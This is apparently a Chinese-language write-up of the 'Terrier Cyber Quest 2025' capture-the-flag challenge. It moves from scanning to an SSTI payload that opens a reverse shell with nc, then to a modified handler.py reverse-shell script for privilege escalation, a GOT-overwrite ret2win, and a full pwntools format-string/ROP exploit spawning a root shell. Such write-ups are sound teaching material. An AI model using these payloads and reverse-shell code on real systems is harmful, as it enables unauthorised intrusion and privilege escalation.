Terrier Cyber Quest 2025 — 简要记录
初始访问
运行nmap扫描:
sudo nmap -sC 192.168.57.24 -A -v -p-
在5000端口发现运行中的web服务器。
使用ffuf进行目录和端点模糊测试:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://192.168.57.24:5000/FUZZ -fs 3806
发现页面并测试SSTI,确认存在漏洞。
输入以下payload获得初始立足点:
{{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('nc -e /bin/bash IP PORT').read()}}
获得第一个flag:FLAG -> S3Cur1ty_Br3@k_P@55ed
在根目录发现可疑目录,找到包含下一个挑战提示的笔记。
根据提示调查pcapng文件并复制所有ICMP数据。
通过十六进制解码获得编码文本:22gSOqdlldjDbbIxZ4NPAeodlIvKmMGjj3ZTw9D5fXc1ffsERpc7CznmEVd1BhfbqbQaIJ5s4
使用CyberChef解码得到:Pass:H1dden_W0rlD_UnD3r_Bit
还发现Container.png文件并导出。
使用OpenStego工具获得flower用户的凭据:F!ow3r#92@tY8&Vk
观察发现除了root外还有更多用户:cat /etc/passwd
权限提升 — 第一阶段
使用ssh获得flower用户的shell。
在侦察中发现名为handler的目录,明显不同用户有不同的权限。
检查运行进程时,看到daemon.py在/handler目录中作为leaf用户运行。
进一步调查daemon.py发现,它将handler.py从/handler复制到/tmp/目录作为leaf用户,然后作为leaf用户执行。注意到我对/handler/handler.py文件有rw权限,因此修改了它。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
#!/usr/bin/env python3
import socket, os, pty, sys, time, traceback
HOST = "127.0.0.1"
PORT = 6969
CONNECT_TIMEOUT = 6.0
def main():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(CONNECT_TIMEOUT)
s.connect((HOST, PORT))
s.settimeout(None)
try:
s.sendall(b"handler: connected - spawning PTY shell\n")
except Exception:
pass
except Exception as e:
time.sleep(0.2)
return
fd = s.fileno()
os.dup2(fd, 0)
os.dup2(fd, 1)
os.dup2(fd, 2)
try:
pty.spawn("/bin/sh")
except Exception:
try:
os.execv("/bin/sh", ["/bin/sh", "-i"])
except Exception:
try:
s.close()
except Exception:
pass
if __name__ == "__main__":
try:
main()
except Exception:
traceback.print_exc()
time.sleep(0.2)
|
通过执行nc -nvlp 8080触发daemon.py将handler.py复制为/tmp/handler_exec.py作为leaf用户。
成功获得leaf用户权限,获得第三个flag:FLAG -> Y0u_kn0w_i5_th15_RaC3
权限提升 — 第二阶段
从侦察中发现/bin/包含一个作为stem用户运行的二进制文件,leaf用户被允许执行它。
获得这个challenge文件并调查,很可能是一个pwn挑战。
使用反编译器,看起来像是一个ret2win挑战。
从代码中看到需要输入的用户名是john。
然后有一个password_check()函数,它确保关于字符串的一些约束,存在多个这样的字符串将满足密码要求。
另外注意到Partial RELRO只是将GOT移动到程序变量之上,意味着不能溢出到GOT,但它是可写的,并且不是位置无关的可执行文件。
还注意到使用Index和Name可以任意覆盖内存(不完全是),但在我们的情况下可以覆盖GOT表条目到win()函数。
在这里,我们能够用win()函数覆盖exit@got[plt]条目,从而作为stem弹出一个shell。
获得stem用户,从而获得第四个flag:FLAG -> PwN_2_0wN_N0w_Y0u_ar3_5t3M
权限提升 — 第三阶段
在侦察中发现另一个名为final的二进制文件。
检查二进制文件时,发现了一个格式字符串漏洞,可以用来泄漏libc、二进制文件和栈canary的内存地址。
通过调试和错误试验,发现在以下位置我们获得了__libc_start_call_main()、栈canary和main()的地址。
以下函数存在栈缓冲区溢出漏洞:sub_401223()
尽管这个./final挑战开启了所有保护,但这并不重要,因为我们能够泄漏栈,然后执行返回导向编程来调用libc函数。
以下是我用来攻破./final挑战的漏洞利用代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
from pwn import *
p = process("/bin/final")
p.sendline(b"%43$p-%61$p-%64$p")
leak = p.clean().split(b'Your Name:\n')[1].split(b'\n\n')[0].split(b'-')
canary = int(leak[1].decode(), 16)
main_addr = int(leak[2].decode(), 16)
libc_start_call_main = int(leak[0].decode(), 16) - 120 #__libc_start_call_main
libc_start_main = libc_start_call_main + 0xae # __libc_start_main
libc_base_addr = libc_start_main - 0x2a200 # 0x2a200 = libc_start_main - offset of __libc_start_main
binsh = libc_base_addr + 0x1cb42f # 0x1cb42f = offset in libc.so.6 for "/bin/sh" string
libc_system = libc_base_addr + 0x58750 # 0x58750 = offset in libc.so.6 for "system()" call
libc_pop_rdi_ret = libc_base_addr + 0x10f75b # pop rdi; ret gadget in libc.so.6
libc_ret = libc_base_addr + 0x10f75c # ret; gadget in libc.so.6
libc_setuid = libc_base_addr + 0x10ea90 # setuid() call in libc.so.6
real_canary = p64(canary)
real_main_addr = p64(main_addr)
real_libc_system = p64(libc_system)
real_binsh = p64(binsh)
real_libc_pop_rdi_ret = p64(libc_pop_rdi_ret)
real_libc_ret = p64(libc_ret)
real_libc_setuid = p64(libc_setuid)
print("[+] Obtained Canary :: {}".format(leak[1]))
print("[+] main() Address :: {}".format(leak[2]))
print("[+] __libc_start_main() Address :: {}".format(hex(libc_start_main)))
print("[+] libc_base_addr Address :: {}".format(hex(libc_base_addr)))
payload = b""
payload += b"A" * 0x48 # buffer
payload += real_canary # canary
payload += b"B" * 0x8 # saved_rbp
payload += real_libc_pop_rdi_ret # pop rdi; ret
payload += p64(0)
payload += real_libc_ret # ret;
payload += real_libc_setuid # setuid(0)
payload += real_libc_pop_rdi_ret # pop rdi; ret
payload += real_binsh # "/bin/sh"
payload += real_libc_ret # ret;
payload += real_libc_system # system()
payload += b"\x90" * 0x8
p.send(payload)
print(p.clean())
p.interactive()
|
运行python3 final_pwn.py脚本,获得最终flag:D4Y_0_T0_zeR0_d4Y
后记
感谢阅读这篇简要记录。如果我有心情,我会为最后一个关于二进制利用的挑战发布更长的记录。如果您有任何问题,请告诉我。祝黑客愉快💖。